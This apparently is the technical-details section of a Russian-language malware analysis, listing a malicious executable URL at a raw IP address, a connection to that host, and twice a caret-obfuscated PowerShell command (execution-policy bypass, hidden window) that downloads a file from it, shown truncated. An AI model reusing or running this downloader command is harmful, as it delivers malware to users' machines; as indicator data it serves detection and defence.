Техническая информация
- http://86.110.117.205/0210.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OW^e^r^sHell.eXE^ ^-^EX^ECution^poLiC^Y B^ypaSs ^-^NOPrOF^IlE^ ^-windOW^stY^LE^ hI^dd^eN ^(N^ew-oBJE^Ct ^SYstem.nEt^.weB^cliE^n^T^).DoWNLoAd^FILe('http://86.110.117.205/021...
- '86.##0.117.205':80
- '<SYSTEM32>\cmd.exe' /C "P^OW^e^r^sHell.eXE^ ^-^EX^ECution^poLiC^Y B^ypaSs ^-^NOPrOF^IlE^ ^-windOW^stY^LE^ hI^dd^eN ^(N^ew-oBJE^Ct ^SYstem.nEt^.weB^cliE^n^T^).DoWNLoAd^FILe('http://86.110.117.205/021...' (со скрытым окном)